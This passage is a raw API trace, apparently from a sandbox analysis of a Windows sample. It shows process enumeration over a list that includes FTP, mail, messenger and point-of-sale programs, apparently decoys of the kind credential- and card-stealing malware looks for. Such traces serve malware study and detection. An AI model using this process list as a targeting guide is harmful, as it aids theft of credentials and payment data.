| out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.018] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.021] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.023] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.026] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.028] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.030] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.033] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.035] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.037] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.106] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.109] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0235.112] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.115] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.117] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.120] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0235.123] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0235.125] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0235.128] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.131] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.133] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.136] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.138] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.201] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.204] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.206] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.207] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.210] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0235.211] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0235.213] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0235.215] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0235.217] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0235.219] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0235.221] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0235.224] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0235.226] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0235.229] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0235.231] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0235.233] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0235.255] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0235.258] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0235.260] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0235.262] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0235.264] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.266] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.267] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.269] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.271] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.273] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.275] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.277] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.282] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.285] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.287] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0235.289] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0235.291] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0235.296] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0235.298] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0235.300] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0235.303] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0235.305] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0235.308] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0235.310] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0235.312] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0235.315] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0235.317] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0235.318] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.320] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0235.322] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.324] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.326] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.328] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.334] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.336] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.338] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.340] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.342] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.344] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0235.346] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0235.348] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.349] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.351] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.353] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0235.355] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.358] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.362] Process32Next (in: hSnapshot=0x222c, 